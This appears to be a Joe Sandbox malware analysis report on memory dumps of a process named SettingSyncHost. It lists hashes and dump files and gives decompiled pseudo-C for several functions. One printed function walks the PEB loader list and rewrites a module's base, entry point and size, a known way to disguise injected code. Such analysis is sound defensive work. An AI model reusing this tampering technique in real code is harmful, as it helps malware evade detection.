                                                                                                                                      • Opcode Fuzzy Hash: 355b4cdd8161d6da2239363025bfc21885ca96783615694a5eb38ed82566fae8
                                                                                                                                      • Instruction Fuzzy Hash: 5E9002A425120147865517705E0D59626D05A9964675208A2E111C8565EA6044189525
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DED5B, Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0
                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                      • Opcode ID: da35cb29aeece45d6fcb613843855d688fed5f340346c263a486c17ad30fd9e1
                                                                                                                                      • Instruction ID: 1a2cc3330cafd18e5185c8fe3d10e93c95454e4661f78e9f9d808d48288fa6b8
                                                                                                                                      • Opcode Fuzzy Hash: da35cb29aeece45d6fcb613843855d688fed5f340346c263a486c17ad30fd9e1
                                                                                                                                      • Instruction Fuzzy Hash: F75139736006449EDB3BBA28B4D97BEAF9B6F51300F15091FE446DF7C2DA119D488352
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00391FE0, Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 17%
                                                                                                                                      			E00391FE0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v12;
				intOrPtr* _v24;
				intOrPtr _v36;
				intOrPtr _v48;
				intOrPtr _v60;
				void _v256;
				intOrPtr _t102;
				intOrPtr _t107;
				void* _t110;
				void* _t119;
				void* _t120;
				long long* _t122;
				void* _t123;
				long long* _t124;
				long long* _t126;
				void* _t127;
				long long* _t129;
				long long* _t130;
				long long* _t132;
				long long* _t134;
				long long* _t136;
				long long _t140;
				long long _t141;
				long long _t142;
				long long _t143;
				long long _t144;
				long long _t145;
				long long _t146;
				long long _t147;

				_t110 = __edx;
				memset( &_v256, 0xcccccccc, 0x3f << 2);
				_v36 =  *[fs:0x30];
				_t6 = _a4 + 0x3c; // 0x100
				_v48 = _a4 +  *_t6;
				_t122 = _t120 + 0xc - 8;
				_t140 =  *0x3bbc50;
				 *_t122 = _t140;
				E00393700(_t110);
				 *_t122 = _t140;
				E003935B0(_t110);
				 *_t122 = _t140;
				E00393460(_t110);
				 *_t122 = _t140;
				E00393340();
				st0 = _t140;
				_t123 = _t122 + 8;
				_t9 = _a4 + 0x3c; // 0x100
				_t10 =  &_a8; // 0x392e0a
				_t111 =  *_t10;
				if(( *( *_t10 +  *_t9 + 0x16) & 0x2000) == 0) {
					 *((intOrPtr*)(_v36 + 8)) = _a4;
				}
				_t124 = _t123 - 8;
				_t141 =  *0x3bbc50;
				 *_t124 = _t141;
				E00393700(_t111);
				 *_t124 = _t141;
				E003935B0(_t111);
				 *_t124 = _t141;
				E00393460(_t111);
				 *_t124 = _t141;
				E00393340();
				st0 = _t141;
				_v12 =  *((intOrPtr*)(_v36 + 0xc)) + 0x14;
				_t126 = _t124 + 8 - 8;
				_t142 =  *0x3bbc50;
				 *_t126 = _t142;
				E00393700(_t111);
				 *_t126 = _t142;
				E003935B0(_t111);
				 *_t126 = _t142;
				E00393460(_t111);
				 *_t126 = _t142;
				E00393340();
				st0 = _t142;
				_t127 = _t126 + 8;
				_t102 =  *((intOrPtr*)(_v36 + 0xc));
				_t112 =  *((intOrPtr*)(_t102 + 0x14));
				_v24 =  *((intOrPtr*)(_t102 + 0x14));
				while(1) {
					_t65 = _v24;
					if(_v24 == _v12) {
						break;
					}
					_v60 = _v24 - 8;
					_t129 = _t127 - 8;
					_t143 =  *0x3bbc50;
					 *_t129 = _t143;
					E00393700(_t112);
					 *_t129 = _t143;
					E003935B0(_t112);
					 *_t129 = _t143;
					E00393460(_t112);
					 *_t129 = _t143;
					E00393340();
					st0 = _t143;
					_t127 = _t129 + 8;
					if( *((intOrPtr*)(_v60 + 0x18)) == _a8) {
						_t130 = _t127 - 8;
						_t144 =  *0x3bbc50;
						 *_t130 = _t144;
						E00393700(_t112);
						 *_t130 = _t144;
						E003935B0(_t112);
						 *_t130 = _t144;
						E00393460(_t112);
						 *_t130 = _t144;
						E00393340();
						st0 = _t144;
						 *((intOrPtr*)(_v60 + 0x18)) = _a4;
						_t132 = _t130 + 8 - 8;
						_t145 =  *0x3bbc50;
						 *_t132 = _t145;
						E00393700(_t112);
						 *_t132 = _t145;
						E003935B0(_t112);
						 *_t132 = _t145;
						E00393460(_t112);
						 *_t132 = _t145;
						E00393340();
						st0 = _t145;
						_t113 = _v60;
						 *((intOrPtr*)(_v60 + 0x1c)) = _a4 +  *((intOrPtr*)(_v48 + 0x28));
						_t134 = _t132 + 8 - 8;
						_t146 =  *0x3bbc50;
						 *_t134 = _t146;
						E00393700(_v60);
						 *_t134 = _t146;
						E003935B0(_t113);
						 *_t134 = _t146;
						E00393460(_t113);
						 *_t134 = _t146;
						E00393340();
						st0 = _t146;
						_t107 = _v48;
						_t114 =  *((intOrPtr*)(_t107 + 0x50));
						 *((intOrPtr*)(_v60 + 0x20)) =  *((intOrPtr*)(_t107 + 0x50));
						_t136 = _t134 + 8 - 8;
						_t147 =  *0x3bbc50;
						 *_t136 = _t147;
						E00393700( *((intOrPtr*)(_t107 + 0x50)));
						 *_t136 = _t147;
						E003935B0( *((intOrPtr*)(_t107 + 0x50)));
						 *_t136 = _t147;
						E00393460(_t114);
						 *_t136 = _t147;
						_t65 = E00393340();
						st0 = _t147;
						_t127 = _t136 + 8;
					} else {
						_v24 =  *_v24;
						continue;
					}
					break;
				}
				__eflags = _t119 - _t127 + 0xfc;
				return E003931A1(_t65, _t119 - _t127 + 0xfc);
			}
































                                                                                                                                      0x00391fe0
                                                                                                                                      0x00391ffc
                                                                                                                                      0x00392004
                                                                                                                                      0x0039200d
                                                                                                                                      0x00392010
                                                                                                                                      0x00392013
                                                                                                                                      0x00392016
                                                                                                                                      0x0039201c
                                                                                                                                      0x0039201f
                                                                                                                                      0x00392024
                                                                                                                                      0x00392027
                                                                                                                                      0x0039202c
                                                                                                                                      0x0039202f
                                                                                                                                      0x00392034
                                                                                                                                      0x00392037
                                                                                                                                      0x0039203c
                                                                                                                                      0x0039203e
                                                                                                                                      0x00392044
                                                                                                                                      0x00392047
                                                                                                                                      0x00392047
                                                                                                                                      0x00392054
                                                                                                                                      0x0039205c
                                                                                                                                      0x0039205c
                                                                                                                                      0x0039205f
                                                                                                                                      0x00392062
                                                                                                                                      0x00392068
                                                                                                                                      0x0039206b
                                                                                                                                      0x00392070
                                                                                                                                      0x00392073
                                                                                                                                      0x00392078
                                                                                                                                      0x0039207b
                                                                                                                                      0x00392080
                                                                                                                                      0x00392083
                                                                                                                                      0x00392088
                                                                                                                                      0x00392096
                                                                                                                                      0x00392099
                                                                                                                                      0x0039209c
                                                                                                                                      0x003920a2
                                                                                                                                      0x003920a5
                                                                                                                                      0x003920aa
                                                                                                                                      0x003920ad
                                                                                                                                      0x003920b2
                                                                                                                                      0x003920b5
                                                                                                                                      0x003920ba
                                                                                                                                      0x003920bd
                                                                                                                                      0x003920c2
                                                                                                                                      0x003920c4
                                                                                                                                      0x003920ca
                                                                                                                                      0x003920cd
                                                                                                                                      0x003920d0
                                                                                                                                      0x003920dd
                                                                                                                                      0x003920dd
                                                                                                                                      0x003920e3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003920ef
                                                                                                                                      0x003920f2
                                                                                                                                      0x003920f5
                                                                                                                                      0x003920fb
                                                                                                                                      0x003920fe
                                                                                                                                      0x00392103
                                                                                                                                      0x00392106
                                                                                                                                      0x0039210b
                                                                                                                                      0x0039210e
                                                                                                                                      0x00392113
                                                                                                                                      0x00392116
                                                                                                                                      0x0039211b
                                                                                                                                      0x0039211d
                                                                                                                                      0x00392129
                                                                                                                                      0x0039212d
                                                                                                                                      0x00392130
                                                                                                                                      0x00392136
                                                                                                                                      0x00392139
                                                                                                                                      0x0039213e
                                                                                                                                      0x00392141
                                                                                                                                      0x00392146
                                                                                                                                      0x00392149
                                                                                                                                      0x0039214e
                                                                                                                                      0x00392151
                                                                                                                                      0x00392156
                                                                                                                                      0x00392161
                                                                                                                                      0x00392164
                                                                                                                                      0x00392167
                                                                                                                                      0x0039216d
                                                                                                                                      0x00392170
                                                                                                                                      0x00392175
                                                                                                                                      0x00392178
                                                                                                                                      0x0039217d
                                                                                                                                      0x00392180
                                                                                                                                      0x00392185
                                                                                                                                      0x00392188
                                                                                                                                      0x0039218d
                                                                                                                                      0x0039219b
                                                                                                                                      0x0039219e
                                                                                                                                      0x003921a1
                                                                                                                                      0x003921a4
                                                                                                                                      0x003921aa
                                                                                                                                      0x003921ad
                                                                                                                                      0x003921b2
                                                                                                                                      0x003921b5
                                                                                                                                      0x003921ba
                                                                                                                                      0x003921bd
                                                                                                                                      0x003921c2
                                                                                                                                      0x003921c5
                                                                                                                                      0x003921ca
                                                                                                                                      0x003921d2
                                                                                                                                      0x003921d5
                                                                                                                                      0x003921d8
                                                                                                                                      0x003921db
                                                                                                                                      0x003921de
                                                                                                                                      0x003921e4
                                                                                                                                      0x003921e7
                                                                                                                                      0x003921ec
                                                                                                                                      0x003921ef
                                                                                                                                      0x003921f4
                                                                                                                                      0x003921f7
                                                                                                                                      0x003921fc
                                                                                                                                      0x003921ff
                                                                                                                                      0x00392204
                                                                                                                                      0x00392206
                                                                                                                                      0x0039212b
                                                                                                                                      0x003920da
                                                                                                                                      0x00000000
                                                                                                                                      0x003920da
                                                                                                                                      0x00000000
                                                                                                                                      0x00392129
                                                                                                                                      0x00392219
                                                                                                                                      0x00392223

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .9
                                                                                                                                      • API String ID: 0-2798968288
                                                                                                                                      • Opcode ID: cf4e413f7d8c7f751db94aac23303ada37fb88a65c9d92ea7b5e093e350f806d
                                                                                                                                      • Instruction ID: cd4b7fd7e4d2796879c63d791e4fe3103986ef58e6d18d71b654d77b26787291
                                                                                                                                      • Opcode Fuzzy Hash: cf4e413f7d8c7f751db94aac23303ada37fb88a65c9d92ea7b5e093e350f806d
                                                                                                                                      • Instruction Fuzzy Hash: 9A51FCB4904509DBCF0ABF58E48A86DFFB0FF48714F1148A9F8C45A291DF319A68CB56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EFE99, Relevance: .6, Instructions: 637COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 830061a271f99cf64c9797af188e39ef1506c8bdcd2cbc85bb78ff9b27cfedd2
                                                                                                                                      • Instruction ID: 40a185c87676c2c1417318b4d8a2910595e1e8000068088a31c38bb50ffc51a7
                                                                                                                                      • Opcode Fuzzy Hash: 830061a271f99cf64c9797af188e39ef1506c8bdcd2cbc85bb78ff9b27cfedd2
                                                                                                                                      • Instruction Fuzzy Hash: 53322521D29F054DD7279638C926339A24EAFB73C5F15C737F919B9AA6EB29C4C34100
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003CE5D0, Relevance: .4, Instructions: 419COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a6df1bfa72704d2d2dd4e0dc9d7dfcaa850a1523628791e525f5facf80f413d2
                                                                                                                                      • Instruction ID: 099940fab160a3ba6c62c0412dd542f3812af93fb6ec4c49e4d32a643c19ff94
                                                                                                                                      • Opcode Fuzzy Hash: a6df1bfa72704d2d2dd4e0dc9d7dfcaa850a1523628791e525f5facf80f413d2
                                                                                                                                      • Instruction Fuzzy Hash: 78E1BC72E10119ABDB16DFA8DC41EAEBBB9EF48700F15422EF815BB241D734AD118B91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039D88D, Relevance: .4, Instructions: 355COMMONCrypto
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039D88D(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t205;
				signed char _t206;
				signed char _t207;
				signed char _t209;
				signed char _t210;
				signed int _t215;
				signed int _t291;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t333;
				void* _t335;
				void* _t337;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t291 = 0;
					L17:
					if(_t291 != 0) {
						goto L1;
					}
					_t205 =  *(_t196 - 0x1b);
					if(_t205 ==  *(_t200 - 0x1b)) {
						_t291 = 0;
						L28:
						if(_t291 != 0) {
							goto L1;
						}
						_t206 =  *(_t196 - 0x17);
						if(_t206 ==  *(_t200 - 0x17)) {
							_t291 = 0;
							L39:
							if(_t291 != 0) {
								goto L1;
							}
							_t207 =  *(_t196 - 0x13);
							if(_t207 ==  *(_t200 - 0x13)) {
								_t291 = 0;
								L50:
								if(_t291 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t291 = 0;
									L61:
									if(_t291 != 0) {
										goto L1;
									}
									_t209 =  *(_t196 - 0xb);
									if(_t209 ==  *(_t200 - 0xb)) {
										_t291 = 0;
										L72:
										if(_t291 != 0) {
											goto L1;
										}
										_t210 =  *(_t196 - 7);
										if(_t210 ==  *(_t200 - 7)) {
											_t291 = 0;
											L83:
											if(_t291 != 0) {
												goto L1;
											}
											_t294 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t294 == 0) {
												L5:
												_t296 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t296 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t8 = (0 | _t197 > 0x00000000) - 1; // -1
														_t197 = (_t197 > 0) + _t8;
													}
													L2:
													return _t197;
												}
												_t215 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												if(_t215 != 0) {
													L86:
													_t197 = _t215;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t215 = (0 | _t294 > 0x00000000) + (0 | _t294 > 0x00000000) - 1;
											if(_t215 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t298 = (_t210 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t298 == 0) {
											L76:
											_t300 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t300 == 0) {
												L78:
												_t302 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t302 == 0) {
													L80:
													_t291 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t291 != 0) {
														_t189 = (0 | _t291 > 0x00000000) - 1; // -1
														_t291 = (_t291 > 0) + _t189;
													}
													goto L83;
												}
												_t183 = (0 | _t302 > 0x00000000) - 1; // -1
												_t291 = (_t302 > 0) + _t183;
												if(_t291 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t177 = (0 | _t300 > 0x00000000) - 1; // -1
											_t291 = (_t300 > 0) + _t177;
											if(_t291 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t171 = (0 | _t298 > 0x00000000) - 1; // -1
										_t291 = (_t298 > 0) + _t171;
										if(_t291 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t305 = (_t209 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t305 == 0) {
										L65:
										_t307 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t307 == 0) {
											L67:
											_t309 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t309 == 0) {
												L69:
												_t291 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t291 != 0) {
													_t164 = (0 | _t291 > 0x00000000) - 1; // -1
													_t291 = (_t291 > 0) + _t164;
												}
												goto L72;
											}
											_t158 = (0 | _t309 > 0x00000000) - 1; // -1
											_t291 = (_t309 > 0) + _t158;
											if(_t291 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t152 = (0 | _t307 > 0x00000000) - 1; // -1
										_t291 = (_t307 > 0) + _t152;
										if(_t291 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t146 = (0 | _t305 > 0x00000000) - 1; // -1
									_t291 = (_t305 > 0) + _t146;
									if(_t291 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t312 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L54:
									_t314 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L56:
										_t316 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L58:
											_t291 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t291 != 0) {
												_t139 = (0 | _t291 > 0x00000000) - 1; // -1
												_t291 = (_t291 > 0) + _t139;
											}
											goto L61;
										}
										_t133 = (0 | _t316 > 0x00000000) - 1; // -1
										_t291 = (_t316 > 0) + _t133;
										if(_t291 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t127 = (0 | _t314 > 0x00000000) - 1; // -1
									_t291 = (_t314 > 0) + _t127;
									if(_t291 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t121 = (0 | _t312 > 0x00000000) - 1; // -1
								_t291 = (_t312 > 0) + _t121;
								if(_t291 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t319 = (_t207 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L43:
								_t321 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L45:
									_t323 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L47:
										_t291 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t291 != 0) {
											_t113 = (0 | _t291 > 0x00000000) - 1; // -1
											_t291 = (_t291 > 0) + _t113;
										}
										goto L50;
									}
									_t107 = (0 | _t323 > 0x00000000) - 1; // -1
									_t291 = (_t323 > 0) + _t107;
									if(_t291 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t101 = (0 | _t321 > 0x00000000) - 1; // -1
								_t291 = (_t321 > 0) + _t101;
								if(_t291 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t95 = (0 | _t319 > 0x00000000) - 1; // -1
							_t291 = (_t319 > 0) + _t95;
							if(_t291 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t326 = (_t206 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t326 == 0) {
							L32:
							_t328 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t328 == 0) {
								L34:
								_t330 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t330 == 0) {
									L36:
									_t291 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t291 != 0) {
										_t88 = (0 | _t291 > 0x00000000) - 1; // -1
										_t291 = (_t291 > 0) + _t88;
									}
									goto L39;
								}
								_t82 = (0 | _t330 > 0x00000000) - 1; // -1
								_t291 = (_t330 > 0) + _t82;
								if(_t291 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t76 = (0 | _t328 > 0x00000000) - 1; // -1
							_t291 = (_t328 > 0) + _t76;
							if(_t291 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t70 = (0 | _t326 > 0x00000000) - 1; // -1
						_t291 = (_t326 > 0) + _t70;
						if(_t291 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t333 = (_t205 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t333 == 0) {
						L21:
						_t335 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t335 == 0) {
							L23:
							_t337 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t337 == 0) {
								L25:
								_t291 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t291 != 0) {
									_t63 = (0 | _t291 > 0x00000000) - 1; // -1
									_t291 = (_t291 > 0) + _t63;
								}
								goto L28;
							}
							_t57 = (0 | _t337 > 0x00000000) - 1; // -1
							_t291 = (_t337 > 0) + _t57;
							if(_t291 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t51 = (0 | _t335 > 0x00000000) - 1; // -1
						_t291 = (_t335 > 0) + _t51;
						if(_t291 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t45 = (0 | _t333 > 0x00000000) - 1; // -1
					_t291 = (_t333 > 0) + _t45;
					if(_t291 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t38 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t38;
								}
								goto L17;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t32 = __edx - 1; // -1
							__esi = __edx + _t32;
							if(__edx + _t32 != 0) {
								goto L1;
							}
							goto L14;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t26 = __edx - 1; // -1
						__esi = __edx + _t26;
						if(__edx + _t26 != 0) {
							goto L1;
						}
						goto L12;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t20 = __edx - 1; // -1
					__esi = __edx + _t20;
					if(__edx + _t20 != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t291;
				goto L2;
			}

































                                                                                                                                      0x0039d88d
                                                                                                                                      0x0039d88d
                                                                                                                                      0x0039d893
                                                                                                                                      0x0039d90b
                                                                                                                                      0x0039d90d
                                                                                                                                      0x0039d90f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d915
                                                                                                                                      0x0039d91b
                                                                                                                                      0x0039d992
                                                                                                                                      0x0039d994
                                                                                                                                      0x0039d996
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d99c
                                                                                                                                      0x0039d9a2
                                                                                                                                      0x0039da19
                                                                                                                                      0x0039da1b
                                                                                                                                      0x0039da1d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da23
                                                                                                                                      0x0039da29
                                                                                                                                      0x0039daa0
                                                                                                                                      0x0039daa2
                                                                                                                                      0x0039daa4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dab0
                                                                                                                                      0x0039db28
                                                                                                                                      0x0039db2a
                                                                                                                                      0x0039db2c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db32
                                                                                                                                      0x0039db38
                                                                                                                                      0x0039dbaf
                                                                                                                                      0x0039dbb1
                                                                                                                                      0x0039dbb3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dbb9
                                                                                                                                      0x0039dbbf
                                                                                                                                      0x0039dc36
                                                                                                                                      0x0039dc38
